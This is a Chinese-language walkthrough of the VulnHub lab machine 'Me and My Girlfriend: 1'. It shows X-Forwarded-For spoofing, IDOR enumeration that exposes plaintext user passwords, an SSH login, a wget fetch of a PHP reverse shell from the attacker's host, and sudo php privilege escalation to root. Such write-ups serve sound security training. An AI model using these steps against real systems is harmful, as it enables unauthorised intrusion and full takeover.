vulnhub靶机Me and My Girlfriend : 1-Writeup渗透测试

一、信息收集

打开靶机后,先用netdiscover进行IP扫描:
vulnhub靶机Me and My Girlfriend : 1-Writeup渗透测试_第1张图片
确定靶机IP为192.168.1.106后,扫描它的端口开放情况:

namp -sV -A -p 0-65535 192.168.1.106

vulnhub靶机Me and My Girlfriend : 1-Writeup渗透测试_第2张图片
发现靶机只开放了22和80端口,打开80端口看一下:
在这里插入图片描述
这段话的意思是:你是谁?黑客吗?对不起,本网站只能在本地访问!
然后试着先扫描一下目录:

dirb http://192.168.1.106

vulnhub靶机Me and My Girlfriend : 1-Writeup渗透测试_第3张图片
发现一个robots.txt文件,打开一看又发现一个heyhoo.txt文件,再打开看后发现一句话,并没有什么用:
vulnhub靶机Me and My Girlfriend : 1-Writeup渗透测试_第4张图片
在这里插入图片描述
然后回到刚刚的那句话,查看页面源码可知:
在这里插入图片描述
(也许你可以搜索如何使用x-forward -for)
了解完x-forward -for以后就开始利用它。

二、抓包改包

使用bp抓包:
vulnhub靶机Me and My Girlfriend : 1-Writeup渗透测试_第5张图片
添加上这一行,然后放回去:
vulnhub靶机Me and My Girlfriend : 1-Writeup渗透测试_第6张图片
会发现url上多了些东西,然后再继续抓包改包:
vulnhub靶机Me and My Girlfriend : 1-Writeup渗透测试_第7张图片
vulnhub靶机Me and My Girlfriend : 1-Writeup渗透测试_第8张图片发现页面有4个超链接,经过尝试并没有发现什么其他漏洞,既然有个注册页面,就先注册一个账户进去看一下,在这里需要注意的是,再访问每个页面的时候都得进行抓包改包。

三、漏洞利用

先注册一个admin用户,看看注册得的这个用户进去以后是啥样的
vulnhub靶机Me and My Girlfriend : 1-Writeup渗透测试_第9张图片
vulnhub靶机Me and My Girlfriend : 1-Writeup渗透测试_第10张图片
进来以后是这样的,这句话并没有什么用,然后发现有一个配置文件的超链接,打开看一下:
vulnhub靶机Me and My Girlfriend : 1-Writeup渗透测试_第11张图片
再联想url中的id,好像是可以查看用户的,尝试修改抓包修改一下,
vulnhub靶机Me and My Girlfriend : 1-Writeup渗透测试_第12张图片
vulnhub靶机Me and My Girlfriend : 1-Writeup渗透测试_第13张图片
果然和我们猜想的一样,可以爆出用户的账户,密码在源码里可以看见:
vulnhub靶机Me and My Girlfriend : 1-Writeup渗透测试_第14张图片
我们知道它22端口还开着,会不会这就是靶机中的一个用户,然后尝试着进行ssh连接,发现这个用户并不可行,既然id=1是一个用户,那是不是还有其他的用户呢?然后依次抓包修改,随后一共爆出了5个用户:

id=1  eweuhtandingan skuyatuh
id=2  aingmaung	 qwerty!!!
id=3  sundatea	 indONEsia
id=4  sedihaingmah  cedihhihihi
id=5  alice  4lic3

然后依次进行连接,发现只有最后一个用户可以登录进入:
vulnhub靶机Me and My Girlfriend : 1-Writeup渗透测试_第15张图片

四、反弹shell提权

先来看看这个用户都可以执行哪些命令,具有怎样的权限:

sudo -l

vulnhub靶机Me and My Girlfriend : 1-Writeup渗透测试_第16张图片
发现这个用户竟然可以使用sudo用root执行php命令,所以在这我们就可以想到利用php脚本反弹shell。我们先来看看它这下面都有什么文件:

ls -al

vulnhub靶机Me and My Girlfriend : 1-Writeup渗透测试_第17张图片
发现一个隐藏文件my_secret,打开看一下,

ls -al .my_secret

vulnhub靶机Me and My Girlfriend : 1-Writeup渗透测试_第18张图片
在这里,发现了flag1.txt:

cat .my_secret/flag1.txt

vulnhub靶机Me and My Girlfriend : 1-Writeup渗透测试_第19张图片
在kali系统中有自带的php脚本:
在这里插入图片描述
我们选择php-reverse-shell.php,然后把这个脚本下载到靶机中。使用python3搭建简易服务器:

python3 -m http.server 6666
wget http://192.168.1.107:6666/php-reverse-shell.php

在这里插入图片描述vulnhub靶机Me and My Girlfriend : 1-Writeup渗透测试_第20张图片
然后修改这个文件:

vim php-reverse-shell.php

vulnhub靶机Me and My Girlfriend : 1-Writeup渗透测试_第21张图片
保存退出后,返回到攻击机,然后监听1234端口:
在这里插入图片描述
然后再回到靶机中运行这个php文件:

sudo php php-reverse-shell.php

在这里插入图片描述
vulnhub靶机Me and My Girlfriend : 1-Writeup渗透测试_第22张图片
成功到达root用户,然后进入root用户下发现flag2.txt:

cd /root
ls

vulnhub靶机Me and My Girlfriend : 1-Writeup渗透测试_第23张图片

cat flag2.txt

vulnhub靶机Me and My Girlfriend : 1-Writeup渗透测试_第24张图片

你可能感兴趣的:(vulnhub)